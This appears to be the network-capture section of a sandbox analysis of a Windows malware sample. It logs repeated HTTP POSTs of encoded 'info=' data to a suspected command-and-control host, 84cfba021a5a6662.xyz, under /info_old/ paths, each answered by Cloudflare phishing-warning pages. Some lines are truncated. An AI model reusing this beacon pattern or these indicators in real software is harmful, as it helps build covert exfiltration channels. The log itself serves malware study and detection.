                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                  cf-request-id: 07f09c00580000722de58a1000000001
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=vj1Vqs2FD2NYSoF7uok2Ug7SdDHDX5%2FX7Ez6WiJ99y2YyDaBEodnTgwX9CBAamkhpvh1v76jR6iRD7K4QkgoGmEzhqLiYIWIZ7T4LaNf3Nxe6Owv4A%3D%3D"}],"max_age":604800,"group":"cf-nel"}
                                                                                                                                                                  NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 619462ad5858722d-AMS
                                                                                                                                                                  Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" co
                                                                                                                                                                  Jan 29, 2021 17:38:46.659538031 CET | 261 | IN
                                                                                                                                                                  Data Ascii: ntent="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-
                                                                                                                                                                  Jan 29, 2021 17:38:46.659560919 CET | 262 | IN
                                                                                                                                                                  Data Ascii: <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be
                                                                                                                                                                  Jan 29, 2021 17:38:46.659573078 CET | 263 | IN
                                                                                                                                                                  Data Ascii: > </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <sp
                                                                                                                                                                  Jan 29, 2021 17:38:46.659586906 CET | 263 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 0
                                                                                                                                                                  Jan 29, 2021 17:38:57.523209095 CET | 606 | OUT | POST /info_old/e HTTP/1.1
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                                  Content-Length: 677
                                                                                                                                                                  Host: 84cfba021a5a6662.xyz
                                                                                                                                                                  Jan 29, 2021 17:38:57.523325920 CET | 606 | OUT
                                                                                                                                                                  Data Ascii: info=WySAnbXjWTW8YGXUGcJV9XQKqvXCI1AmWDBJj4U-g1WKRvnxTscwduFT2BfCXgg0h7Sxqatla3ng8ukL-pl8Dr8N8HqDpScYTbUy6uw5ZL-MPhpTNUsvoyOqifmBCVQiT6Y7NpBzPsi912F8WNCFScT8b-uWJRUCEPgr_QY2cinQd9sNw2c_3TQDzSqhX4WKYPwaiFyLCUTMojROHTa1EECTRm3aGKyWGwr5K8DJV4r30i
                                                                                                                                                                  Jan 29, 2021 17:38:57.578520060 CET | 608 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 29 Jan 2021 16:38:57 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Set-Cookie: __cfduid=d0c77f8ee470537dddd2ec92d793e6cef1611938337; expires=Sun, 28-Feb-21 16:38:57 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                  cf-request-id: 07f09c2b1b0000722de5b61000000001
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2BZOJ1cnVLyD8bjwQnQt99GunNGqbpH1vv7YKluExGYIR1FU%2B2y4iFkkwUc2YSO3VbUXGZV3xWKV%2BVmTFtD9bZvArPsHP%2Bg7ZOzCaA4jBLLoue8wa1Q%3D%3D"}],"max_age":604800,"group":"cf-nel"}
                                                                                                                                                                  NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 619462f1bd2b722d-AMS
                                                                                                                                                                  Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewpo
                                                                                                                                                                  Jan 29, 2021 17:38:57.578546047 CET | 609 | IN
                                                                                                                                                                  Data Ascii: rt" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href=
                                                                                                                                                                  Jan 29, 2021 17:38:57.578562975 CET | 611 | IN
                                                                                                                                                                  Data Ascii: "> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending
                                                                                                                                                                  Jan 29, 2021 17:38:57.578577995 CET | 612 | IN
                                                                                                                                                                  Data Ascii: </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13">
                                                                                                                                                                  Jan 29, 2021 17:38:57.578589916 CET | 612 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 0
                                                                                                                                                                  Jan 29, 2021 17:38:57.634712934 CET | 612 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                                  Content-Length: 81
                                                                                                                                                                  Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:57.634824038 CET 613 OUT
                                                                                                                                                                  Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVYxyRt0-Ufg1U9INIMC9p9w~
Jan 29, 2021 17:38:57.693810940 CET 614 IN HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 29 Jan 2021 16:38:57 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Set-Cookie: __cfduid=d0c77f8ee470537dddd2ec92d793e6cef1611938337; expires=Sun, 28-Feb-21 16:38:57 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                  cf-request-id: 07f09c2b8e0000722de28e5000000001
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=TltZmQ4ZAgCnC4XZHARQuJ6c3SjymJnZnZrmM9mXZoJeXnjrEWuI%2FMrWj8lYOCOeNeO%2BRY2jk3uPLxZ4AMtf9xZFwNzvgcohA4k8gWqE5jaNMamf6Q%3D%3D"}],"max_age":604800,"group":"cf-nel"}
                                                                                                                                                                  NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 619462f27def722d-AMS
                                                                                                                                                                  Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport"
Jan 29, 2021 17:38:57.693840027 CET 615 IN
                                                                                                                                                                  Data Ascii: content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cd
Jan 29, 2021 17:38:57.694220066 CET 617 IN
                                                                                                                                                                  Data Ascii: <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to b
Jan 29, 2021 17:38:58.145667076 CET 624 OUT POST /info_old/g HTTP/1.1
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                                  Content-Length: 1393
                                                                                                                                                                  Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:58.145747900 CET 625 OUT
                                                                                                                                                                  Data Ascii: info=WySAnbXjWTW8YGXUGcJV9XQKqvXCI1AmWDBJj4U-g1WKRvnxTscwduFT2BfCXgg0h7Sxqatla3ng8ukL-pl8Dr8N8HqDpScYTbUy6uw5ZL9dPu8tHcojNuCBF8eIzti4Vho2kjGOlZLWPpAmv1ZvQ0m-fNMyJBD174tp0UlzzJOpo86hSdKCdUttUdEpqJPwwrnFsdl_TfL4womc76QP-MZzjcPY7uGheIZ8B3_edDyOuY
Jan 29, 2021 17:38:58.201672077 CET 627 IN HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 29 Jan 2021 16:38:58 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Set-Cookie: __cfduid=d20309c657c3aa8033289bcf78fb7eb2f1611938338; expires=Sun, 28-Feb-21 16:38:58 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                  cf-request-id: 07f09c2d860000722ded166000000001
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=wwZW7r1Jc28fPnL8KXVfjpY1Ziyt%2BVfRG01K4TjvhT5qwKsR7RJ21bq397U3d2CIwET%2BOZMYmtfYXfvyyTFQdNjTJZFM6R80dsGHyFuHHl4IPtLkQA%3D%3D"}],"max_age":604800,"group":"cf-nel"}
                                                                                                                                                                  NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 619462f5af7b722d-AMS
                                                                                                                                                                  Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport"
Jan 29, 2021 17:38:58.209351063 CET 631 OUT POST /info_old/w HTTP/1.1
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                                  Content-Length: 81
                                                                                                                                                                  Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:58.209429026 CET 631 OUT
                                                                                                                                                                  Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVTsSQwMTI3T4uQu6BWMgxpg~
Jan 29, 2021 17:38:58.264574051 CET 633 IN HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 29 Jan 2021 16:38:58 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Set-Cookie: __cfduid=d20309c657c3aa8033289bcf78fb7eb2f1611938338; expires=Sun, 28-Feb-21 16:38:58 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                  cf-request-id: 07f09c2dc70000722de513d000000001
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=JdIGm0HRyN6TmoSouRicUz8GfAA2HWr7izc91aOmOjRxyh2jhFYR5yNkdtmWkFWvCuEMfAAsSdyFPwIzrFONpb2meMEyMMnX5uLHflgX%2Bpa5HkS2Rg%3D%3D"}],"max_age":604800,"group":"cf-nel"}
                                                                                                                                                                  NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 619462f60fc3722d-AMS
                                                                                                                                                                  Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" co
Jan 29, 2021 17:38:58.266551018 CET 637 OUT GET /info_old/r HTTP/1.1
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                                  Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:38:58.319027901 CET 639 IN HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 29 Jan 2021 16:38:58 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Set-Cookie: __cfduid=d20309c657c3aa8033289bcf78fb7eb2f1611938338; expires=Sun, 28-Feb-21 16:38:58 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                  cf-request-id: 07f09c2e000000722de9acb000000001
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=3BF6MsVzUm%2BiKRPPF%2B4BTQEMKHBP5v0DntkQQxydAste4RKwERxEQTDedOV9mtMIEdcfBZu6ISIX5alRxSygxXrEAr2hXe7tbga46N4b4y81UJuBwA%3D%3D"}],"max_age":604800,"group":"cf-nel"}
                                                                                                                                                                  NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 619462f66fe9722d-AMS
                                                                                                                                                                  Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport"
Jan 29, 2021 17:39:15.366708040 CET | 1191 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                                  Content-Length: 81
                                                                                                                                                                  Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:39:15.366833925 CET | 1191 | OUT | Data Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 65 4c 39 39 71 72 45 30 32 4f 31 47 46 52 6a 30 50 36 5f 47 36 63 7e
                                                                                                                                                                  Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVeL99qrE02O1GFRj0P6_G6c~
Jan 29, 2021 17:39:15.638581038 CET | 1191 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                                  Content-Length: 81
                                                                                                                                                                  Host: 84cfba021a5a6662.xyz
                                                                                                                                                                  Data Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 65 4c 39 39 71 72 45 30 32 4f 31 47 46 52 6a 30 50 36 5f 47 36 63 7e
                                                                                                                                                                  Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVeL99qrE02O1GFRj0P6_G6c~
Jan 29, 2021 17:39:15.951106071 CET | 1192 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                                  Content-Length: 81
                                                                                                                                                                  Host: 84cfba021a5a6662.xyz
                                                                                                                                                                  Data Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 65 4c 39 39 71 72 45 30 32 4f 31 47 46 52 6a 30 50 36 5f 47 36 63 7e
                                                                                                                                                                  Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVeL99qrE02O1GFRj0P6_G6c~
Jan 29, 2021 17:39:16.560844898 CET | 1193 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                                  Content-Length: 81
                                                                                                                                                                  Host: 84cfba021a5a6662.xyz
                                                                                                                                                                  Data Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 65 4c 39 39 71 72 45 30 32 4f 31 47 46 52 6a 30 50 36 5f 47 36 63 7e
                                                                                                                                                                  Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVeL99qrE02O1GFRj0P6_G6c~
Jan 29, 2021 17:39:17.779493093 CET | 1211 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                                  Content-Length: 81
                                                                                                                                                                  Host: 84cfba021a5a6662.xy
                                                                                                                                                                  Data Raw:
                                                                                                                                                                  Data Ascii:
Jan 29, 2021 17:39:17.868499041 CET | 1211 | OUT | Data Raw: 0d 0a 0d 0a 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 65 4c 39 39 71 72 45 30 32 4f 31 47 46 52 6a 30 50 36 5f 47
                                                                                                                                                                  Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVeL99qrE02O1GFRj0P6_G6c~
Jan 29, 2021 17:39:17.942154884 CET | 1213 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 29 Jan 2021 16:39:17 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Set-Cookie: __cfduid=dbcccb0326f30df5ee2ada287f6033e851611938357; expires=Sun, 28-Feb-21 16:39:17 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                  cf-request-id: 07f09c7a910000722de2251000000001
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=5jwELGRBcFgHzEg%2FJqjKprpf%2F17zeJUpjwDtj4f7AAl9korLlxe%2BFfP3qD%2B0hhkFUSup%2BlKCwjgLkU2r5KVgB4uXMQI0pLdYEG0x9RKrvDOyLRSAWA%3D%3D"}],"max_age":604800,"group":"cf-nel"}
                                                                                                                                                                  NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 619463705d70722d-AMS
                                                                                                                                                                  Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="view


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49722 | 104.21.23.16 | 80 | C:\Users\user\Desktop\N1yprTBBXs.exe
Timestamp | kBytes transferred | Direction | Data
Jan 29, 2021 17:38:48.794128895 CET | 264 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
